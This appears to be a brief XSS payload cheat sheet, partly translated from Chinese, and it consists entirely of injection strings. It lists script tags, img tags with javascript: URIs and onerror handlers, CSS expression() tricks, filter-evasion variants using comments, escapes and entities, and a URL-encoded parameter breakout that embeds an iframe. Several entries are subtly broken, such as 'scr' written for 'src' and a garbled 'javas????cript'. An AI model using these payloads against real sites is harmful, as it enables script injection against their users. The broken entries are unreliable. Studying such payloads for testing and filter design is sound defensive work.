<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/* */ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["